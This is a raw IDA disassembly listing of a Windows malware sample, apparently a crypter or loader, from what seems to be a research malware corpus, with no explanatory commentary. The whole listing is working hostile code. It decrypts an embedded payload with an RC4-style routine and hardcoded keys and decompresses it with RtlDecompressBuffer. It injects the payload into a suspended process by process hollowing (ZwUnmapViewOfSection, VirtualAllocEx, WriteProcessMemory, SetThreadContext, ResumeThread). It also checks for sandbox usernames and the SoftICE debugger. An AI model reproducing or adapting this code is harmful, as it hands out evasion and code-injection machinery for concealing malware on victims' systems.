;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 9A52679900ACA1F1A2530E4D52135201
; File Name : u:\work\9a52679900aca1f1a2530e4d52135201_orig.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 000048AF ( 18607.)
; Section size in file : 00004A00 ( 18944.)
; Offset to raw data for section: 00000400
; Flags 60000020: Text Executable Readable
; Alignment : default
; OS type : MS Windows
; Application type: Executable 32bit
include uni.inc ; see unicode subdir of ida for info on unicode
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Execute
_text segment para public 'CODE' use32
assume cs:_text
;org 401000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401000 proc near ; CODE XREF: sub_401881+CA�p
var_10 = byte ptr -10h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 10h
push esi
mov esi, [ebp+arg_8]
imul esi, 64h
inc esi
push esi ; Size
call _malloc
test eax, eax
pop ecx
mov [ebp+var_8], eax
jz short loc_401086
push ebx
push offset LibFileName ; "ntdll.dll"
call ds:LoadLibraryA ; LoadLibraryA
mov ebx, eax
test ebx, ebx
jz short loc_401083
push edi
mov edi, ds:GetProcAddress
push offset ProcName ; "RtlDecompressBuffer"
push ebx ; hModule
call edi ; GetProcAddress
push offset aRtlgetcompress ; "RtlGetCompressionWorkSpaceSize"
push ebx ; hModule
mov [ebp+var_4], eax
call edi ; GetProcAddress
cmp [ebp+arg_8], 0
pop edi
jz short loc_401083
cmp [ebp+var_4], 0
jz short loc_401083
test eax, eax
jz short loc_401083
lea ecx, [ebp+var_C]
push ecx
lea ecx, [ebp+var_10]
push ecx
push 2
call eax
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_0]
push esi
push [ebp+var_8]
push 2
call [ebp+var_4]
push ebx ; hLibModule
call ds:FreeLibrary ; FreeLibrary
mov eax, [ebp+var_8]
jmp short loc_401085
; ---------------------------------------------------------------------------
loc_401083: ; CODE XREF: sub_401000+2C�j
; sub_401000+4D�j ...
xor eax, eax
loc_401085: ; CODE XREF: sub_401000+81�j
pop ebx
loc_401086: ; CODE XREF: sub_401000+1A�j
pop esi
leave
retn
sub_401000 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_401089(char *Str, int, int)
sub_401089 proc near ; CODE XREF: sub_401881+B5�p
; sub_401881+D8�p
var_210 = byte ptr -210h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
Str = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 210h
mov eax, [ebp+arg_8]
push esi
lea esi, [eax+eax*4]
push edi
shl esi, 1
push esi ; Size
call _malloc
xor edi, edi
cmp eax, edi
pop ecx
mov [ebp+var_C], eax
jnz short loc_4010B3
xor eax, eax
jmp loc_40119F
; ---------------------------------------------------------------------------
loc_4010B3: ; CODE XREF: sub_401089+21�j
push esi ; Size
push edi ; Val
push eax ; Dst
call _memset
add esp, 0Ch
xor eax, eax
loc_4010C0: ; CODE XREF: sub_401089+44�j
mov [ebp+eax+var_210], al
inc eax
cmp eax, 0FFh
jle short loc_4010C0
mov [ebp+var_8], edi
mov [ebp+var_4], edi
mov esi, 100h
push ebx
loc_4010DB: ; CODE XREF: sub_401089+9E�j
mov edi, [ebp+var_4]
push [ebp+Str] ; Str
lea edi, [ebp+edi+var_210]
mov bl, [edi]
call _strlen
xor edx, edx
pop ecx
mov ecx, eax
mov eax, [ebp+var_4]
div ecx
mov eax, [ebp+Str]
movsx ecx, byte ptr [edx+eax]
add ecx, [ebp+var_8]
movzx eax, bl
add eax, ecx
cdq
mov ecx, esi
idiv ecx
inc [ebp+var_4]
cmp [ebp+var_4], 0FFh
lea eax, [ebp+edx+var_210]
mov cl, [eax]
mov [edi], cl
mov [ebp+var_8], edx
mov [eax], bl
jle short loc_4010DB
xor eax, eax
cmp [ebp+arg_8], eax
mov [ebp+var_8], eax
mov [ebp+var_4], eax
jle short loc_40119B
mov eax, [ebp+arg_4]
sub eax, [ebp+var_C]
mov [ebp+var_10], eax
loc_40113F: ; CODE XREF: sub_401089+110�j
mov eax, [ebp+var_4]
cdq
mov ecx, esi
idiv ecx
mov edi, esi
lea ecx, [ebp+edx+var_210]
mov bl, [ecx]
movzx eax, bl
add eax, [ebp+var_8]
cdq
idiv edi
lea eax, [ebp+edx+var_210]
mov [ebp+var_8], edx
mov dl, [eax]
mov [ecx], dl
mov edx, [ebp+var_C]
mov [eax], bl
mov eax, [ebp+var_4]
lea edi, [eax+edx]
movzx eax, byte ptr [ecx]
movzx ecx, bl
add eax, ecx
cdq
mov ecx, esi
idiv ecx
mov ecx, [ebp+var_10]
mov al, [ebp+edx+var_210]
xor al, [ecx+edi]
inc [ebp+var_4]
mov [edi], al
mov eax, [ebp+var_4]
cmp eax, [ebp+arg_8]
jl short loc_40113F
loc_40119B: ; CODE XREF: sub_401089+AB�j
mov eax, [ebp+var_C]
pop ebx
loc_40119F: ; CODE XREF: sub_401089+25�j
pop edi
pop esi
leave
retn
sub_401089 endp
; =============== S U B R O U T I N E =======================================
sub_4011A3 proc near ; CODE XREF: sub_4011C8+5B�p
; sub_4011C8+AE�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
xor eax, eax
cmp [esp+arg_4], eax
jle short locret_4011C7
mov ecx, [esp+arg_0]
mov edx, dword_4082C4
add ecx, edx
loc_4011B7: ; CODE XREF: sub_4011A3+22�j
mov dl, [ecx+eax]
mov byte_408300[eax], dl
inc eax
cmp eax, [esp+arg_4]
jl short loc_4011B7
locret_4011C7: ; CODE XREF: sub_4011A3+6�j
retn
sub_4011A3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4011C8 proc near ; CODE XREF: WinMain(x,x,x,x)+A8�p
var_13C = byte ptr -13Ch
Dst = byte ptr -5Ch
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_16 = word ptr -16h
var_8 = word ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 13Ch
mov eax, dword_408040
mov ecx, dword_4082C4
push ebx
push esi
lea esi, [ecx+eax]
mov bl, [esi]
mov byte_4082CC, bl
mov cl, [esi+1]
push edi
mov edi, nNumberOfBytesToRead
mov byte_4082FC, cl
mov cl, [esi+2]
neg byte_4082FC
sub edi, eax
neg bl
neg cl
cmp edi, 40h
mov byte_4082CC, bl
mov byte_4082C0, cl
jb loc_4012BE
add eax, 3
push 40h
push eax
call sub_4011A3
pop ecx
pop ecx
mov byte_408340, 0
xor esi, esi
loc_401233: ; CODE XREF: sub_4011C8+81�j
mov cl, byte_4082FC
lea eax, dword_408301[esi]
add [eax-1], bl
add [eax], cl
inc esi
inc esi
cmp esi, 40h
jb short loc_401233
push 40h ; Size
mov ebx, offset byte_408300
lea eax, [ebp+Dst]
push ebx ; Src
push eax ; Dst
call _memcpy
mov eax, [ebp+var_20]
lea ecx, [eax+18h]
add esp, 0Ch
cmp edi, ecx
jb short loc_4012BE
mov ecx, dword_408040
lea eax, [ecx+eax+3]
push 18h
push eax
call sub_4011A3
pop ecx
pop ecx
mov byte_408318, 0
xor esi, esi
loc_401286: ; CODE XREF: sub_4011C8+DA�j
mov cl, byte_4082CC
lea eax, dword_408301[esi]
add [eax-1], cl
mov cl, byte_4082FC
add [eax], cl
inc esi
inc esi
cmp esi, 18h
jb short loc_401286
push 18h ; Size
lea eax, [ebp+var_1C]
push ebx ; Src
push eax ; Dst
call _memcpy
mov esi, 0E0h
add esp, 0Ch
cmp [ebp+var_8], si
jz short loc_4012C5
loc_4012BE: ; CODE XREF: sub_4011C8+4F�j
; sub_4011C8+9F�j
xor al, al
jmp loc_4013AB
; ---------------------------------------------------------------------------
loc_4012C5: ; CODE XREF: sub_4011C8+F4�j
mov ecx, dword_408040
mov eax, [ebp+var_20]
lea eax, [ecx+eax+1Bh]
push esi
push eax
call sub_4011A3
pop ecx
pop ecx
mov byte_4083E0, 0
xor edi, edi
loc_4012E4: ; CODE XREF: sub_4011C8+137�j
mov cl, byte_4082CC
lea eax, dword_408301[edi]
add [eax-1], cl
mov cl, byte_4082FC
add [eax], cl
inc edi
inc edi
cmp edi, esi
jb short loc_4012E4
push esi ; Size
lea eax, [ebp+var_13C]
push ebx ; Src
push eax ; Dst
call _memcpy
movzx eax, [ebp+var_16]
lea eax, [eax+eax*4]
shl eax, 3
push eax ; dwBytes
call ??2@YAPAXI@Z ; operator new(uint)
movzx esi, [ebp+var_16]
mov ecx, dword_408040
mov [ebp+var_4], eax
mov eax, [ebp+var_20]
lea esi, [esi+esi*4]
shl esi, 3
lea eax, [ecx+eax+0FBh]
push esi
push eax
call sub_4011A3
add esp, 18h
xor edi, edi
test esi, esi
mov byte_408300[esi], 0
jbe short loc_401370
loc_401353: ; CODE XREF: sub_4011C8+1A6�j
mov cl, byte_4082CC
lea eax, dword_408301[edi]
add [eax-1], cl
mov cl, byte_4082FC
add [eax], cl
inc edi
inc edi
cmp edi, esi
jb short loc_401353
loc_401370: ; CODE XREF: sub_4011C8+189�j
push esi ; Size
push ebx ; Src
push [ebp+var_4] ; Dst
call _memcpy
mov edi, [ebp+arg_0]
mov eax, [ebp+arg_10]
add esp, 0Ch
push 10h
pop ecx
push 6
lea esi, [ebp+Dst]
rep movsd
mov edi, [ebp+arg_8]
pop ecx
lea esi, [ebp+var_1C]
rep movsd
mov edi, [ebp+arg_C]
push 38h
pop ecx
lea esi, [ebp+var_13C]
rep movsd
mov ecx, [ebp+var_4]
mov [eax], ecx
mov al, 1
loc_4013AB: ; CODE XREF: sub_4011C8+F8�j
pop edi
pop esi
pop ebx
leave
retn
sub_4011C8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4013B0 proc near ; CODE XREF: WinMain(x,x,x,x)+CA�p
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
mov eax, [ebp+arg_8]
mov ecx, [eax+3Ch]
push esi
mov esi, [eax+20h]
xor edx, edx
mov eax, ecx
div esi
test edx, edx
jz short loc_4013CD
lea ecx, [eax+1]
imul ecx, esi
loc_4013CD: ; CODE XREF: sub_4013B0+15�j
mov eax, [ebp+arg_4]
movzx eax, word ptr [eax+6]
test eax, eax
jle short loc_401406
push ebx
mov ebx, [ebp+arg_C]
push edi
add ebx, 8
mov [ebp+arg_8], eax
loc_4013E3: ; CODE XREF: sub_4013B0+52�j
mov edi, [ebx]
test edi, edi
jz short loc_4013FC
xor edx, edx
mov eax, edi
div esi
test edx, edx
jnz short loc_4013F7
add ecx, edi
jmp short loc_4013FC
; ---------------------------------------------------------------------------
loc_4013F7: ; CODE XREF: sub_4013B0+41�j
imul eax, esi
add ecx, eax
loc_4013FC: ; CODE XREF: sub_4013B0+37�j
; sub_4013B0+45�j
add ebx, 28h
dec [ebp+arg_8]
jnz short loc_4013E3
pop edi
pop ebx
loc_401406: ; CODE XREF: sub_4013B0+26�j
mov eax, ecx
pop esi
pop ebp
retn
sub_4013B0 endp
; =============== S U B R O U T I N E =======================================
sub_40140B proc near ; CODE XREF: sub_401425+A9�p
; sub_401425+12D�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
xor edx, edx
div [esp+arg_4]
test edx, edx
jnz short loc_40141E
mov eax, [esp+arg_0]
retn
; ---------------------------------------------------------------------------
loc_40141E: ; CODE XREF: sub_40140B+C�j
inc eax
imul eax, [esp+arg_4]
retn
sub_40140B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_401425(int, int, int, size_t Size, int, void *Dst)
sub_401425 proc near ; CODE XREF: WinMain(x,x,x,x)+FA�p
arg_4 = dword ptr 0Ch
Size = dword ptr 14h
arg_10 = dword ptr 18h
Dst = dword ptr 1Ch
push ebp
mov ebp, esp
mov eax, dword_4082C4
push ebx
push esi
mov esi, dword_408040
add eax, esi
mov bl, [eax]
mov byte_4082CC, bl
mov cl, [eax+1]
mov byte_4082FC, cl
mov al, [eax+2]
neg byte_4082FC
neg al
mov byte_4082C0, al
mov eax, [ebp+Size]
neg bl
mov byte_4082CC, bl
push edi
mov edi, [eax+3Ch]
mov eax, [ebp+arg_4]
movzx eax, word ptr [eax+6]
test eax, eax
jle short loc_401486
mov ecx, [ebp+arg_10]
add ecx, 14h
loc_401478: ; CODE XREF: sub_401425+5F�j
mov edx, [ecx]
cmp edx, edi
jnb short loc_401480
mov edi, edx
loc_401480: ; CODE XREF: sub_401425+57�j
add ecx, 28h
dec eax
jnz short loc_401478
loc_401486: ; CODE XREF: sub_401425+4B�j
push edi
add esi, 3
push esi
call sub_4011A3
pop ecx
xor esi, esi
test edi, edi
pop ecx
mov byte_408300[edi], 0
jbe short loc_4014B6
loc_40149F: ; CODE XREF: sub_401425+8F�j
mov cl, byte_4082FC
lea eax, dword_408301[esi]
add [eax-1], bl
add [eax], cl
inc esi
inc esi
cmp esi, edi
jb short loc_40149F
loc_4014B6: ; CODE XREF: sub_401425+78�j
push edi ; Size
push offset byte_408300 ; Src
push [ebp+Dst] ; Dst
call _memcpy
mov ebx, [ebp+Size]
mov ecx, [ebx+20h]
push ecx
push dword ptr [ebx+3Ch]
call sub_40140B
mov edi, eax
add edi, [ebp+Dst]
mov eax, [ebp+arg_4]
and [ebp+Dst], 0
add esp, 14h
cmp word ptr [eax+6], 0
jbe loc_401584
mov esi, [ebp+arg_10]
add esi, 8
loc_4014F3: ; CODE XREF: sub_401425+159�j
mov eax, [esi+8]
test eax, eax
jbe short loc_40155C
mov [ebp+Size], eax
mov eax, [esi]
cmp [ebp+Size], eax
jbe short loc_401507
mov [ebp+Size], eax
loc_401507: ; CODE XREF: sub_401425+DD�j
mov eax, [esi+0Ch]
mov ecx, dword_408040
push [ebp+Size]
lea eax, [eax+ecx+3]
push eax
call sub_4011A3
mov eax, [ebp+Size]
pop ecx
pop ecx
xor ecx, ecx
test eax, eax
mov byte_408300[eax], 0
jbe short loc_401540
loc_40152F: ; CODE XREF: sub_401425+119�j
mov dl, byte_4082C0
add byte_408300[ecx], dl
inc ecx
cmp ecx, eax
jb short loc_40152F
loc_401540: ; CODE XREF: sub_401425+108�j
push eax ; Size
push offset byte_408300 ; Src
push edi ; Dst
call _memcpy
mov ecx, [ebx+20h]
push ecx
push dword ptr [esi]
call sub_40140B
add esp, 14h
jmp short loc_40156C
; ---------------------------------------------------------------------------
loc_40155C: ; CODE XREF: sub_401425+D3�j
mov eax, [esi]
test eax, eax
jz short loc_40156E
push ecx
push eax
call sub_40140B
add esp, 8
loc_40156C: ; CODE XREF: sub_401425+135�j
add edi, eax
loc_40156E: ; CODE XREF: sub_401425+13B�j
mov eax, [ebp+arg_4]
movzx eax, word ptr [eax+6]
inc [ebp+Dst]
add esi, 28h
cmp [ebp+Dst], eax
jl loc_4014F3
loc_401584: ; CODE XREF: sub_401425+C2�j
pop edi
pop esi
mov al, 1
pop ebx
pop ebp
retn
sub_401425 endp
; =============== S U B R O U T I N E =======================================
sub_40158B proc near ; CODE XREF: sub_4016EE+BD�p
arg_8 = dword ptr 0Ch
arg_10 = dword ptr 14h
arg_14 = dword ptr 18h
mov ecx, [esp+arg_8]
mov eax, [ecx+88h]
test eax, eax
jz short locret_4015FA
cmp dword ptr [ecx+8Ch], 0
jz short locret_4015FA
mov edx, [esp+arg_10]
push esi
mov esi, [esp+4+arg_14]
sub esi, [ecx+1Ch]
add eax, edx
cmp dword ptr [eax+4], 0
jz short loc_4015F9
push ebx
push edi
loc_4015B8: ; CODE XREF: sub_40158B+6A�j
mov ecx, [eax+4]
sub ecx, 8
shr ecx, 1
test ecx, ecx
lea edi, [eax+8]
jle short loc_4015EF
mov ebx, ecx
loc_4015C9: ; CODE XREF: sub_40158B+62�j
xor edx, edx
mov dx, [edi]
mov ecx, edx
and ecx, 0FFFh
add ecx, [esp+0Ch+arg_10]
and dx, 0F000h
add ecx, [eax]
cmp dx, 3000h
jnz short loc_4015EA
add [ecx], esi
loc_4015EA: ; CODE XREF: sub_40158B+5B�j
inc edi
inc edi
dec ebx
jnz short loc_4015C9
loc_4015EF: ; CODE XREF: sub_40158B+3A�j
cmp dword ptr [edi+4], 0
mov eax, edi
jnz short loc_4015B8
pop edi
pop ebx
loc_4015F9: ; CODE XREF: sub_40158B+29�j
pop esi
locret_4015FA: ; CODE XREF: sub_40158B+C�j
; sub_40158B+15�j
retn
sub_40158B endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_4015FB(int, HANDLE hProcess, LPCVOID lpAddress, SIZE_T dwLength)
sub_4015FB proc near ; CODE XREF: sub_401613+A1�p
hProcess = dword ptr 8
lpAddress = dword ptr 0Ch
dwLength = dword ptr 10h
push [esp+dwLength] ; dwLength
push offset Buffer ; lpBuffer
push [esp+8+lpAddress] ; lpAddress
push [esp+0Ch+hProcess] ; hProcess
call ds:VirtualQueryEx ; VirtualQueryEx
retn
sub_4015FB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_401613(LPSTR lpCommandLine, LPPROCESS_INFORMATION lpProcessInformation, int, LPCONTEXT lpContext, int)
sub_401613 proc near ; CODE XREF: WinMain(x,x,x,x)+117�p
StartupInfo = _STARTUPINFOA ptr -48h
var_4 = byte ptr -4
lpCommandLine = dword ptr 8
lpProcessInformation= dword ptr 0Ch
lpContext = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 48h
push esi
mov esi, [ebp+lpProcessInformation]
push edi
push 10h
pop ecx
xor edx, edx
push esi ; lpProcessInformation
xor eax, eax
mov [ebp+StartupInfo.cb], edx
lea edi, [ebp+StartupInfo.lpReserved]
rep stosd
lea eax, [ebp+StartupInfo]
push eax ; lpStartupInfo
push edx ; lpCurrentDirectory
push edx ; lpEnvironment
push 4 ; dwCreationFlags
push edx ; bInheritHandles
push edx ; lpThreadAttributes
push edx ; lpProcessAttributes
push [ebp+lpCommandLine] ; lpCommandLine
push edx ; lpApplicationName
call ds:CreateProcessA ; CreateProcessA
test eax, eax
jz loc_4016CB
mov edi, [ebp+lpContext]
push ebx
push edi ; lpContext
mov dword ptr [edi], 10007h
push dword ptr [esi+4] ; hThread
call ds:GetThreadContext ; GetThreadContext
mov ebx, [ebp+arg_10]
lea eax, [ebp+var_4]
push eax
mov eax, [edi+0A4h]
push 4
push ebx
add eax, 8
push eax
push dword ptr [esi]
call dword_4362C4 ; ReadProcessMemory
mov edi, [ebx]
jmp short loc_4016AD
; ---------------------------------------------------------------------------
loc_40167F: ; CODE XREF: sub_401613+AB�j
cmp Buffer.State, 10000h
jz short loc_4016C0
cmp edi, 0D7E9Bh
jnz short loc_4016A7
push 11h ; uType
push offset Caption ; "f78ret64375u435r q43tr67fstgdyfsew6r65f"...
push offset Text ; "mnbbntrew t regfsdhfiasjdkfjasopdifisdu"...
push 0 ; hWnd
call ds:MessageBoxA ; MessageBoxA
loc_4016A7: ; CODE XREF: sub_401613+7E�j
add edi, Buffer.RegionSize
loc_4016AD: ; CODE XREF: sub_401613+6A�j
push 1Ch ; dwLength
push edi ; lpAddress
push dword ptr [esi] ; hProcess
push 0 ; int
call sub_4015FB
add esp, 10h
test eax, eax
jnz short loc_40167F
loc_4016C0: ; CODE XREF: sub_401613+76�j
sub edi, [ebx]
xor eax, eax
mov [ebx+4], edi
inc eax
pop ebx
jmp short loc_4016CD
; ---------------------------------------------------------------------------
loc_4016CB: ; CODE XREF: sub_401613+32�j
xor eax, eax
loc_4016CD: ; CODE XREF: sub_401613+B6�j
pop edi
pop esi
leave
retn
sub_401613 endp
; =============== S U B R O U T I N E =======================================
sub_4016D1 proc near ; CODE XREF: sub_4016EE+83�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
cmp dword ptr [eax+88h], 0
jz short loc_4016EB
cmp dword ptr [eax+8Ch], 0
jz short loc_4016EB
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_4016EB: ; CODE XREF: sub_4016D1+B�j
; sub_4016D1+14�j
xor eax, eax
retn
sub_4016D1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4016EE proc near ; CODE XREF: WinMain(x,x,x,x)+17B�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
flOldProtect = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
hProcess = dword ptr 28h
arg_24 = dword ptr 2Ch
arg_30 = dword ptr 38h
arg_D4 = dword ptr 0DCh
arg_E0 = dword ptr 0E8h
lpAddress = dword ptr 304h
dwSize = dword ptr 308h
push ebp
mov ebp, esp
mov eax, [ebp+lpAddress]
push ebx
mov ebx, [ebp+flOldProtect]
cmp [ebx+1Ch], eax
push esi
mov esi, ds:VirtualAllocEx
push edi
mov edi, 3000h
jnz short loc_401730
mov ecx, [ebp+dwSize]
cmp [ebp+arg_18], ecx
ja short loc_401730
lea edx, [ebp+flOldProtect]
push edx ; lpflOldProtect
push 40h ; flNewProtect
push ecx ; dwSize
push eax ; lpAddress
push [ebp+hProcess] ; hProcess
mov dword_4362C0, eax
call ds:VirtualProtectEx ; VirtualProtectEx
jmp short loc_401767
; ---------------------------------------------------------------------------
loc_401730: ; CODE XREF: sub_4016EE+1D�j
; sub_4016EE+28�j
mov ecx, [ebp+hProcess]
push eax
push ecx
mov dword_4082F8, ecx
mov dword_4362A8, eax
call dword_4362C8 ; ZwUnmapViewOfSection
test eax, eax
jnz short loc_40174E
mov byte ptr [ebp+flOldProtect+3], 1
loc_40174E: ; CODE XREF: sub_4016EE+5A�j
cmp byte ptr [ebp+flOldProtect+3], 1
jnz short loc_401767
push 40h ; flProtect
push edi ; flAllocationType
push [ebp+arg_18] ; dwSize
push dword ptr [ebx+1Ch] ; lpAddress
push [ebp+hProcess] ; hProcess
call esi ; VirtualAllocEx
mov dword_4362C0, eax
loc_401767: ; CODE XREF: sub_4016EE+40�j
; sub_4016EE+64�j
cmp dword_4362C0, 0
jnz short loc_4017C0
push ebx
call sub_4016D1
add esp, 4
test eax, eax
jz loc_40184E
push 40h ; flProtect
push edi ; flAllocationType
push [ebp+arg_18] ; dwSize
push 0 ; lpAddress
push [ebp+hProcess] ; hProcess
call esi ; VirtualAllocEx
test eax, eax
mov dword_4362C0, eax
jz loc_40184E
push 0
push eax
push [ebp+arg_14]
push [ebp+arg_10]
push ebx
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40158B
add esp, 1Ch
cmp dword_4362C0, 0
jz loc_40184E
loc_4017C0: ; CODE XREF: sub_4016EE+80�j
mov esi, [ebp+arg_D4]
push offset aWriteprocessme ; "WriteProcessMemory"
push offset ModuleName ; "kernel32.dll"
call ds:GetModuleHandleA ; GetModuleHandleA
push eax ; hModule
call ds:GetProcAddress ; GetProcAddress
push 0
push 4
push offset dword_4362C0
add esi, 8
push esi
mov esi, [ebp+hProcess]
push esi
call eax
mov eax, [ebp+arg_0]
mov eax, [eax+3Ch]
mov ecx, dword_4362C0
mov edx, [ebp+arg_14]
mov [eax+edx+34h], ecx
mov eax, dword_4362C0
cmp eax, [ebp+lpAddress]
mov [ebp+arg_30], 10007h
jnz short loc_401825
mov eax, [ebx+10h]
add eax, [ebx+1Ch]
mov [ebp+arg_E0], eax
jmp short loc_401830
; ---------------------------------------------------------------------------
loc_401825: ; CODE XREF: sub_4016EE+127�j
mov ecx, [ebx+10h]
add ecx, eax
mov [ebp+arg_E0], ecx
loc_401830: ; CODE XREF: sub_4016EE+135�j
mov eax, [ebp+arg_24]
lea ecx, [ebp+arg_30]
push ecx
push eax
mov dword_4362B4, esi
mov hThread, eax
call dword_4362CC ; SetThreadContext
xor eax, eax
inc eax
jmp short loc_401850
; ---------------------------------------------------------------------------
loc_40184E: ; CODE XREF: sub_4016EE+8D�j
; sub_4016EE+A7�j ...
xor eax, eax
loc_401850: ; CODE XREF: sub_4016EE+15E�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_4016EE endp
; =============== S U B R O U T I N E =======================================
sub_401855 proc near ; CODE XREF: WinMain(x,x,x,x)+1AD�p
push hThread ; hThread
mov byte_4362B8, 1
call ds:ResumeThread ; ResumeThread
retn
sub_401855 endp
; =============== S U B R O U T I N E =======================================
sub_401869 proc near ; CODE XREF: sub_401881+5B�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
sub eax, dword_408040
inc eax
push eax ; Size
call _malloc
pop ecx
mov dword_4362AC, eax
retn
sub_401869 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_401881(int, LPCSTR lpFileName)
sub_401881 proc near ; CODE XREF: WinMain(x,x,x,x)+39�p
var_8 = dword ptr -8
NumberOfBytesRead= dword ptr -4
lpFileName = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
xor ebx, ebx
push ebx ; hTemplateFile
push 80h ; dwFlagsAndAttributes
push 3 ; dwCreationDisposition
push ebx ; lpSecurityAttributes
push 1 ; dwShareMode
push 80000000h ; dwDesiredAccess
push [ebp+lpFileName] ; lpFileName
call ds:CreateFileA ; CreateFileA
push ebx ; lpFileSizeHigh
push eax ; hFile
mov hFile, eax
call ds:GetFileSize ; GetFileSize
mov nNumberOfBytesToRead, eax
inc eax
push eax ; Size
call _malloc
pop ecx
push ebx ; lpOverlapped
lea ecx, [ebp+NumberOfBytesRead]
push ecx ; lpNumberOfBytesRead
push nNumberOfBytesToRead ; nNumberOfBytesToRead
mov dword_4082C4, eax
push eax ; lpBuffer
push hFile ; hFile
call ds:ReadFile ; ReadFile
push [ebp+NumberOfBytesRead]
call sub_401869
mov edx, [ebp+NumberOfBytesRead]
mov eax, dword_408040
pop ecx
xor ecx, ecx
sub edx, eax
jz short loc_401913
loc_4018F0: ; CODE XREF: sub_401881+90�j
mov edx, dword_4082C4
add eax, edx
mov al, [eax+ecx]
mov edx, dword_4362AC
mov [edx+ecx], al
mov edx, [ebp+NumberOfBytesRead]
mov eax, dword_408040
inc ecx
sub edx, eax
cmp ecx, edx
jb short loc_4018F0
loc_401913: ; CODE XREF: sub_401881+6D�j
mov ecx, dword_4362AC
sub ecx, eax
mov eax, [ebp+NumberOfBytesRead]
mov [ecx+eax], bl
mov eax, [ebp+NumberOfBytesRead]
sub eax, dword_408040
push eax ; int
push dword_4362AC ; int
push offset a6897u546gfd78u ; "6897u546gfd78ui54wn8 gtrewyt rewy tre54"...
call sub_401089
lea ecx, [ebp+var_8]
push ecx
mov ecx, [ebp+NumberOfBytesRead]
sub ecx, dword_408040
push ecx
push ebx
push eax
call sub_401000
push [ebp+var_8] ; int
push eax ; int
push offset a689ytS78eyg67b ; "689yt s78eyg67bsdf67tewa78ytijn4qhkte"
call sub_401089
add esp, 28h
mov dword_408040, ebx
mov dword_4082C4, eax
pop ebx
leave
retn
sub_401881 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40196F proc near ; CODE XREF: WinMain(x,x,x,x)+40�p
String2 = byte ptr -68h
pcbBuffer = dword ptr -4
push ebp
mov ebp, esp
sub esp, 68h
push esi
push 64h
pop esi
push esi ; Size
lea eax, [ebp+String2]
push 0 ; Val
push eax ; Dst
call _memset
add esp, 0Ch
lea eax, [ebp+pcbBuffer]
push eax ; pcbBuffer
lea eax, [ebp+String2]
push eax ; lpBuffer
mov [ebp+pcbBuffer], esi
call ds:GetUserNameA ; GetUserNameA
test eax, eax
jz short loc_4019C5
mov esi, ds:lstrcmpA
lea eax, [ebp+String2]
push eax ; lpString2
push offset String1 ; "USER"
call esi ; lstrcmpA
test eax, eax
jz short loc_4019C1
lea eax, [ebp+String2]
push eax ; lpString2
push offset aCurrentuser ; "CurrentUser"
call esi ; lstrcmpA
test eax, eax
jnz short loc_4019C5
loc_4019C1: ; CODE XREF: sub_40196F+41�j
mov al, 1
jmp short loc_4019C7
; ---------------------------------------------------------------------------
loc_4019C5: ; CODE XREF: sub_40196F+2C�j
; sub_40196F+50�j
xor al, al
loc_4019C7: ; CODE XREF: sub_40196F+54�j
pop esi
leave
retn
sub_40196F endp
; =============== S U B R O U T I N E =======================================
sub_4019CA proc near ; CODE XREF: WinMain(x,x,x,x)+4D�p
push 0 ; hTemplateFile
push 80h ; dwFlagsAndAttributes
push 3 ; dwCreationDisposition
push 0 ; lpSecurityAttributes
push 3 ; dwShareMode
push 0C0000000h ; dwDesiredAccess
push offset FileName ; "\\\\.\\NTICE"
call ds:CreateFileA ; CreateFileA
cmp eax, 0FFFFFFFFh
jz short loc_4019F7
push eax ; hObject
call ds:CloseHandle ; CloseHandle
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_4019F7: ; CODE XREF: sub_4019CA+20�j
xor eax, eax
retn
